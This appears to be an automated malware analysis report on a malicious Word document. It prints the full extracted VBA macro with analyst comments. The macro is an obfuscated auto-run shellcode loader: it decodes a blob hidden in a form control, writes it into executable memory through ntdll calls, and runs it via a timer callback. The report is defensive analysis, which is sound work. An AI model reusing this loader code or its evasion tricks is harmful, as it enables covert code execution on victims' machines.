Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 575f6764cc8041a1…

MALICIOUS

Office (OLE)

338.5 KB Created: 2018-02-15 13:50:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: 4b8c95314c83e1396f880c83250f7f53 SHA-1: 2d8548962e926d0ab9a4d42580261efb2e4593f3 SHA-256: 575f6764cc8041a1e7e22db8ed2db0eaa0a47989f6bfd26e63d867caa632225c
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to execute obfuscated code that likely downloads and executes a second-stage payload. The presence of the 'dictatorship' function, aliased to 'NtWriteVirtualMemory', suggests memory manipulation for payload execution.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    unalterability
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11506 bytes
SHA-256: 2ad3429458464e0e8652d11df492c06fae4194d5d888919d16150da764fd2b11
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



' Auto-run entry point (heuristic OLE_VBA_DOCOPEN): fires when the document is opened and
' hands off to unalterability() in module "volvo", which decodes and executes the payload.
Private Sub Document_Open()
unalterability
' 53 + 43 = 96. The Pmt statement below is VBA's financial Pmt() called with constant
' arguments and its result discarded: dead code, presumably inserted by the obfuscator.
' The same "<name> = a + b" / "Pmt 0, <name>, ..." pair recurs throughout the listing.
bilabial = 53 + 43
 Pmt 0, bilabial, 34615, 52853, 6
End Sub





Attribute VB_Name = "volvo"
' The #If arithmetic is constant: 700 > -220 And 0 < Win64, i.e. a plain Win64 check padded
' with noise. Every #If/#ElseIf in this listing follows the same pattern (the "Not" variants
' reduce to Not Win64).
' 64-bit import of ntdll!NtWriteVirtualMemory under the name "dictatorship"; the 32-bit
' counterpart is declared in module "caparisoned". The Lib name carries trailing spaces,
' presumably to defeat naive string matching on "ntdll" - confirm that the loader tolerates it.
#If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then
Public Declare PtrSafe Function dictatorship _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal untrimmed As Any, ByVal drilled As Any, ByVal penal As Any, ByVal deev As Any, ByVal cytosine As Any) As LongPtr
#End If

' 64-bit wrapper around dictatorship (NtWriteVirtualMemory). From how the arguments are
' forwarded: necturus = destination address, amsonia = source address, auricular = byte count.
' admitted = 83 - 15 - 69 = -1, the current-process pseudo-handle. The bytes-written argument
' (assyrian) is never set, so 0 is passed - presumably relying on that parameter being optional.
' No return value is assigned; callers discard the result. Everything that does not feed the
' call (xenarthra, bloodless, ophite, saimiri/Pmt, acnidosporidia, calambour) looks like junk.
Function defensive(necturus, amsonia, auricular)
Dim numb As String
Dim cypraea As Variant
Dim admitted As LongPtr
Dim naproxen As LongPtr
Dim assyrian As LongPtr
Dim consuetude As Byte
Dim octagon As LongPtr
Dim unhealthfulness As LongPtr
xenarthra = xenarthra Or 126
bloodless = Rnd(467)
naproxen = necturus
unhealthfulness = auricular
ophite = acnidosporidia
octagon = amsonia
saimiri = 57 + 48
Pmt 0, saimiri, 21907, 48719, 5
acnidosporidia = "capacity"
admitted = 83 - 15 - 69
' NtWriteVirtualMemory(-1, naproxen, octagon, unhealthfulness, 0)
dictatorship ByVal admitted, _
naproxen, _
octagon, unhealthfulness, _
assyrian
calambour = acnidosporidia
End Function

' Main stage, called from Document_Open. Reads an encoded blob out of a control on "caustic"
' (the designer-backed module at the end of the listing, which appears to be a UserForm),
' decodes it with caparisoned.bibless, copies it into executable memory via ladylike, and then
' triggers it through carelessly (= Kernel32!CreateTimerQueueTimer) with the buffer as the
' callback. Detection note: Declare of ntdll Nt* plus CreateTimerQueueTimer from a VBA project,
' and a timer callback pointing into a non-image RWX region, are the signals to hunt for.
Function unalterability()
Dim ouzo As Integer
Dim agiotage As Byte
' Day(#12/5/2013#) = 5: selects item 5 of the control. The .SelectedItem/.Name usage below is
' consistent with a TabStrip or MultiPage control, but the control type is not visible here -
' confirm against the form's designer stream.
caustic.chironomidae.Value = Day(#12/5/2013#)
' The following assignments write globals that nothing reads; junk.
varday = misspend = "marshalship"
arbiter = "africanamerican"
phasmida = "pounds"
civile = jul
anubis = ossified

acetyl = bromeliaceae
fagot = esoteric
Set diesel = caustic.chironomidae.SelectedItem
lexicographic = 14 + 47
 Pmt 0, lexicographic, 31959, 39585, 6

' The payload is stored in the selected item's Name: felicitas = 7844, so overestimated is the
' last 7844 characters of that name. bibless decodes them (7844 characters -> 5883 bytes, the
' same length ladylike later hands to NtWriteVirtualMemory).
dappled = diesel.Name
felicitas = 96 - 27 + 7775
overestimated = Right(dappled, felicitas)
intermediary = caparisoned.bibless(overestimated)
marcor = 37 + 29
 Pmt 0, marcor, 23508, 41592, 5

malaysia = "dairying"
aristides = dugout
' Both arms reduce to Win64 / Not Win64 (the arithmetic is 700 > -220 And 0 < Win64); they only
' pick LongPtr vs Long for the locals.
#If (11 - 26 + 415 + 68 - 41 + 273) > ((97 - 127 + 350) - (62 - 52 + 530) * 1) And ((11 - 7 + 24) - (37 - 86 + 77)) * 2 < (Win64) Then
Dim bioluminescent As Integer
Dim rampant As LongPtr
Dim fluted As LongPtr
Dim pinnipedia As String
#ElseIf (16 - 120 + 504 + 16 - 115 + 399) > ((19 - 73 + 374) - (53 - 90 + 577) * 1) And Not ((8 - 24 + 44) - (31 - 70 + 67)) * 2 < (Win64) Then
Dim weakly As String
Dim fluted As Long
Dim selfpollination As Long
Dim rampant As Long
#End If
bitten = 98 - 78 - 20
grande = "perishing"
nonintellectual = "audibly"
accroach = 88 - 81 + 4089
percussionist = 52 + 8
Pmt 0, percussionist, 25347, 13926, 3
anseriformes = "verticilliosis"
balista = "collapsible"
sanctuary = 56 + 45
Pmt 0, sanctuary, 31986, 59737, 5
apologize = intermediary
complying = "fingers"
' ladylike allocates an RWX region, copies the decoded bytes into it and returns its base.
rampant = ladylike(apologize)
backhoe = "adventures"
' Entry-point offset into the copied buffer: vidrio = 2064 on 64-bit, 781 + 3459 = 4240 on 32-bit.
#If (113 - 36 + 323 + 53 - 113 + 360) > ((50 - 25 + 295) - (54 - 100 + 586) * 1) And ((21 - 5 + 12) - (59 - 51 + 20)) * 2 < (Win64) Then
Dim radar As String
Dim youngun As LongPtr
Dim ayr As LongPtr
Dim graft As LongPtr
vidrio = 102 - 38 + 2000
#ElseIf (45 - 115 + 470 + 63 - 9 + 246) > ((114 - 97 + 303) - (77 - 91 + 554) * 1) And Not ((100 - 82 + 10) - (116 - 57 - 31)) * 2 < (Win64) Then
Dim youngun As Long
cooled = 56 - 89 + 814
Dim ayr As Long
Dim graft As Long
vidrio = cooled + 3459
#End If
Dim dalmatian As Variant
Dim rutherford As Integer
' youngun = 0 (used for every zero argument below); fluted = base + offset = callback address;
' ayr = 201527 is only a placeholder - it is passed ByRef and receives the timer handle.
' graft = 3500 is never used.
youngun = 94 - 97 + 3
fluted = rampant + vidrio
ayr = 83 - 48 + 201492
graft = 115 - 106 + 3491
' CreateTimerQueueTimer(phNewTimer=&ayr, TimerQueue=0, Callback=fluted, Parameter=0,
' DueTime=0, Period=0, Flags=0): with DueTime 0 the callback fires right away on a
' thread-pool thread, running the decoded payload. This call is the execution primitive.
chaserbalancer = carelessly(ayr, _
youngun, fluted, _
youngun, youngun, _
youngun, _
youngun)
tubman = 36 + 17
Pmt 0, tubman, 12809, 32011, 6
End Function
' Operator dispatcher used by bibless. The conditions resolve to constants: hypnology = 28
' selects integer division (\), 38 selects bitwise And, 46 selects multiplication. Any other
' selector leaves the return value unassigned (Empty).
Function cerumen(concealed, slating, hypnology)
If hypnology = 28 + (10 / 2 - 5) Then
cerumen = concealed \ slating
ElseIf hypnology = 38 + (5 - 3) / 2 - 1 Then
cerumen = concealed And slating
ElseIf hypnology = 46 + (56 / 7 - 4 * 2) Then
cerumen = concealed * slating
End If
End Function


Attribute VB_Name = "toyota"
' Three API imports split across the bitness branches (each #If reduces to Win64 / Not Win64):
'   deus       -> ntdll!NtAllocateVirtualMemory (PtrSafe/LongPtr for 64-bit, Long for 32-bit)
'   carelessly -> Kernel32!CreateTimerQueueTimer (32-bit here; the 64-bit one is in "caparisoned")
' In both deus declarations "ByVal" has been fused into the parameter names conservatrixByVal /
' swordByVal, which leaves that 4th parameter ByRef - matching the ByRef RegionSize the caller
' (ladylike) passes. The ntdll Lib names again carry trailing spaces.
#If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then
Public Declare PtrSafe Function deus _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (backhoe As LongPtr, idyllic As LongPtr, ByVal hackneyed As LongPtr, conservatrixByVal As LongPtr, galleys As LongPtr, ByVal homoptera As LongPtr) As LongPtr
#End If
#If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then
Public Declare Function carelessly _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (genealogic As Any, ByVal edifice As Any, ByVal colinus As Any, ByVal macron As Any, ByVal eriophyllum As Any, ByVal misdo As Any, ByVal cannon As Any) As Long
#End If
#If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then
Public Declare Function deus _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (closefisted As Long, typhon As Long, ByVal longstanding As Long, swordByVal As Long, aldrovanda As Long, ByVal hipflask As Long) As Long
#End If
' 32-bit counterpart of defensive: wrapper around dictatorship (NtWriteVirtualMemory) with
' dexterity = destination, disaccord = source, acetonic = byte count; parturiunt = 16 - 33 + 16
' = -1 (current process). It is also reached unconditionally from ladylike on the 64-bit path,
' where its Long locals cannot hold a 64-bit address - whether the sample still works there is
' not visible in this listing. No return value is assigned; acnidosporidia/aeromechanic are
' unread globals.
Function colicroot(dexterity, disaccord, acetonic)
Dim ascomycota As Long
Dim parturiunt As Long
Dim habitude As Long
Dim astylar As Long
Dim droshki As Long
Dim proprietress As Byte
ascomycota = dexterity
droshki = acetonic
habitude = disaccord
Pmt 0, (6 + 53), 9860, 17708, 3
parturiunt = 16 - 33 + 16
' NtWriteVirtualMemory(-1, ascomycota, habitude, droshki, 0); astylar is never set.
dictatorship ByVal _
parturiunt, _
ascomycota, habitude, _
droshki, astylar
acnidosporidia = aeromechanic
End Function


Attribute VB_Name = "caparisoned"
' Mirror of the declarations in "volvo"/"toyota" for the other bitness (the #If arithmetic
' reduces to Not Win64 for the first block and Win64 for the second):
'   dictatorship -> ntdll!NtWriteVirtualMemory  (32-bit, Long)
'   carelessly   -> Kernel32!CreateTimerQueueTimer (64-bit, PtrSafe)
' Lib "ntdll    " again carries trailing spaces, presumably to break naive string matching.
#If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then
Public Declare Function dictatorship _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal hopomythumb As Any, ByVal corallorhiza As Any, ByVal exmayor As Any, ByVal philological As Any, ByVal binaural As Any) As Long
#End If
#If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then
Public Declare PtrSafe Function carelessly _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (rostroid As Any, ByVal aegypius As Any, ByVal dictostylium As Any, ByVal obeisance As Any, ByVal microtubule As Any, ByVal actinal As Any, ByVal indefatigation As Any) As Long
#End If
' Decoder for the blob pulled out of the form control. monger is 7844 characters; after a
' per-position subtraction it is standard base64 (value table from gl()), which is unpacked
' 4 characters -> 3 bytes into brachycephalic. The 5883 resulting bytes are returned as a
' String of raw bytes. Many locals/globals in here are assigned and never read (junk).
Function bibless(monger) As String
Dim picrasma As Long
Dim abject() As Byte
Dim character(63) As Long
Dim concentration As String
Dim arctictis(63) As Long
Dim adiathermancy As Long
Dim fencible(63) As Long
acnidosporidia = ophite

Dim auribus As Long
Dim brachycephalic(6962) As Byte
Dim gradual As Integer
Dim balboa As Long
' Constants read by the decode loop: hepatica = 256, goggle = 255, beacon = 65280 (0xFF00),
' margarita = 16711680 (0xFF0000), pastinaca = 64, adoptive = 4096, aleyrodidae = 65536,
' dealing = 262144. bardic, extenuation, alkali, algebraically and conspicuously are unused.
hepatica = 3 - 32 + 285
goggle = 18 - 46 + 283
beacon = 83 - 128 + 65325
Dim attemper As Variant

margarita = 49 - 88 + 16711719
Dim porch As Long

pastinaca = 66 - 38 + 36
bardic = 51 - 34 + 258031
adoptive = 50 - 75 + 4121
extenuation = 69 - 111 + 105
aleyrodidae = 62 - 44 + 65518
alkali = 111 - 80 + 4001
dealing = 42 - 75 + 262177
Dim hardy As Integer

algebraically = 13 - 33 + 16515092
Dim acolyte As Long
conspicuously = 43 - 9 + 7809
Dim modue() As Byte
' 120 + 8 = 128 = vbFromUnicode: one byte per input character.
modue = VBA.StrConv(monger, 120 + 8)
alfresco = 46 + 30
 Pmt 0, alfresco, 19345, 40843, 6

' uria = 7843 -> 7844 bytes. periclase = vbKeyShift - 12 = 16 - 12 = 4: even positions are
' decremented by 4, odd positions by 3, undoing the shift applied when the blob was stored.
uria = 7843
periclase = vbKeyShift - 12
For mantidae = 0 To uria
If mantidae Mod 2 = 0 Then
modue(mantidae) = modue(mantidae) - periclase
End If
If Not mantidae Mod 2 = 0 Then
modue(mantidae) = modue(mantidae) - (periclase - 1)
End If
Next mantidae
overrefinement = 35 + 15
 Pmt 0, overrefinement, 3622, 54992, 2

gradual = 0
' gl() returns the base64 character -> 6-bit value table.
brachytactyly = gl
' For i = 0 To 63: character(i) = i * 64, fencible(i) = i * 4096, arctictis(i) = i * 262144
' (cerumen with selector 46 multiplies): the 6-bit groups pre-shifted by 6, 12 and 18 bits.
For picrasma = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
character(picrasma) = cerumen(picrasma, pastinaca, 46)
fencible(picrasma) = cerumen(picrasma, adoptive, 46)
arctictis(picrasma) = cerumen(picrasma, dealing, 46)
Next picrasma
chelydra = 54 + 56
 Pmt 0, chelydra, 3054, 38140, 6

abject = modue
myxobacteria = 107 - 87 - 16
algometer = 8 + 46
 Pmt 0, algometer, 9931, 52057, 3

' unrequited = 3, antilocapridae = 2. balboa advances 4 per iteration (Next adds 1 after the
' explicit + 3) and adiathermancy advances 3: base64's 4-in / 3-out grouping.
unrequited = 38 - 65 + 30
xenarthra = Math.Round(425)

billing = Math.Round(478)

inevitable = unrequited + 1
antilocapridae = 65 - 1 - 62
For balboa = 0 To uria
' auribus = (t0 << 18) + (t1 << 12) + (t2 << 6) + t3 for the four input bytes at
' balboa .. balboa + 3, where t = brachytactyly(byte) is the table lookup.
spaceship = abject(balboa)
unchartered = abject(balboa + 2)
uncarpeted = fencible(brachytactyly(abject(balboa + 1)))
sheriff = character(brachytactyly(unchartered)) + brachytactyly(abject(balboa + unrequited))
auribus = arctictis(brachytactyly(spaceship)) + uncarpeted + sheriff
' Selector 38 = And, 28 = \: mask and shift bits 23..16, 15..8 and 7..0 of auribus out
' into three consecutive output bytes.
picrasma = cerumen(auribus, margarita, 38)
brachycephalic(adiathermancy) = cerumen(picrasma, aleyrodidae, 28)
picrasma = cerumen(auribus, beacon, 38)
brachycephalic(adiathermancy + 1) = cerumen(picrasma, hepatica, 28)
brachycephalic(adiathermancy + antilocapridae) = cerumen(auribus, goggle, 38)
adiathermancy = adiathermancy + antilocapridae + 1
balboa = balboa + 3
Next
' Byte array assigned to a String return: VBA copies the raw bytes unchanged.
bibless = brachycephalic
End Function




Attribute VB_Name = "camry"
' Copies the decoded payload into newly allocated executable memory and returns its base
' address. reject is the decoded String from bibless (received as a Variant). Both #If arms
' reduce to Win64 / Not Win64 and differ only in pointer width and which wrapper they call.
Function ladylike(reject)
#If (35 - 124 + 489 + 44 - 8 + 264) > ((83 - 77 + 314) - (80 - 32 + 492) * 1) And ((120 - 58 - 34) - (104 - 119 + 43)) * 2 < (Win64) Then
Dim bradycardia As LongPtr
' undiscriminating = 8 = pointer size on 64-bit
undiscriminating = 57 - 47 - 2
Dim monkery As LongPtr
Dim proviso As Long
Dim deprehension As LongPtr
anaclinal = VarPtr(bradycardia)
' NtWriteVirtualMemory(-1, &bradycardia, VarPtr(reject) + 8, 8): copies the pointer stored at
' offset 8 of the Variant (its data field, i.e. the string buffer's address - confirm) into
' bradycardia, so bradycardia then points at the decoded bytes.
analyticity = defensive(anaclinal, VarPtr(reject) + (25 - 17 + 0), undiscriminating)
#End If
#If (44 - 8 + 364 + 53 - 42 + 289) > ((46 - 64 + 338) - (73 - 103 + 570) * 1) And Not ((94 - 67 + 1) - (10 - 70 + 88)) * 2 < (Win64) Then
Dim bradycardia As Long
' undiscriminating = 4 = pointer size on 32-bit; same pointer read as above, via colicroot
undiscriminating = 106 - 96 - 6
Dim monkery As Long
Dim deprehension As Long
anaclinal = VarPtr(bradycardia)
analyticity = colicroot(anaclinal, VarPtr(reject) + (120 - 122 + 10), undiscriminating)
#End If
' Resolved arguments for deus (NtAllocateVirtualMemory): faineant = -1 (current process),
' monkery = 0 (BaseAddress, ByRef - receives the chosen base), boundshave = 0 (ZeroBits),
' deprehension = 9834 (RegionSize, ByRef), pujunan = 4096 = MEM_COMMIT,
' direct = 64 = PAGE_EXECUTE_READWRITE. An RWX commit via ntdll from a VBA project is a
' high-value detection point.
faineant = 25 - 30 + 4
monkery = 3 - 28 + 25
boundshave = 60 - 115 + 55
deprehension = 24 - 41 + 9851
pujunan = 31 - 73 + 4138
direct = 116 - 7 - 45
sob = deus(ByVal faineant, monkery, _
ByVal boundshave, _
deprehension, ByVal pujunan, _
ByVal direct)
' NtWriteVirtualMemory(-1, monkery, bradycardia, 5883): 123 - 29 + 5789 = 5883 bytes of decoded
' payload are copied into the new region (the same count bibless produces). colicroot's locals
' are 32-bit Long even on the 64-bit path; whether that matters here is not visible.
colicroot monkery, _
bradycardia, (123 - 29 + 5789)
Pmt 0, (50 + 54), 39113, 40818, 3
' Returns the region's base address; unalterability adds an offset and uses it as a callback.
ladylike = monkery * 1
End Function

' Builds the base64 decoding table (index = character code, value = 6-bit value). The
' arithmetic resolves to: 65..90 ('A'-'Z') -> 0..25, 48..57 ('0'-'9') -> 52..61,
' 97..122 ('a'-'z') -> 26..51, 47 ('/') -> 63, 43 ('+') -> 62. Each loop's Exit For guard
' fires one step late, so indexes 91, 58 and 123 also receive a value; base64 input never
' contains those characters, so this has no effect on decoding.
Function gl()
Dim fictive(255) As Byte
' southeastern = 65; loop bound 91; entry = code - 65
southeastern = 52 - 2 + 15
For i = southeastern To (90 - 120 + 121)
fictive(southeastern) = southeastern - (38 - 83 + 110)
southeastern = southeastern + 1
If (84 - 44 + 51) < southeastern Then Exit For
Next
' southeastern = 48; loop bound 58; entry = code + 4
southeastern = (21 - 78 + 105)
For i = southeastern To (42 - 127 + 143)
fictive(southeastern) = southeastern + (24 - 55 + 35)
southeastern = southeastern + 1
If (118 - 77 + 17) < southeastern Then Exit For
Next
' southeastern = 97; loop bound 123; entry = code - 71
southeastern = (49 - 58 + 106)
For i = southeastern To (50 - 51 + 124)
fictive(southeastern) = southeastern - (40 - 102 + 133)
southeastern = southeastern + 1
If (53 - 46 + 116) < southeastern Then Exit For
Next
' fictive(47) = 63 ('/') and fictive(43) = 62 ('+')
fictive(32 - 107 + 122) = (113 - 94 + 44)
southeastern = (48 - 57 + 52)
fictive(southeastern) = (60 - 106 + 108)
gl = fictive
End Function


Attribute VB_Name = "caustic"
Attribute VB_Base = "0{C10451D2-9E60-4F2F-AE37-F17E746662AB}{F84CFD52-C31F-41D7-ADE1-BD3143E05519}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False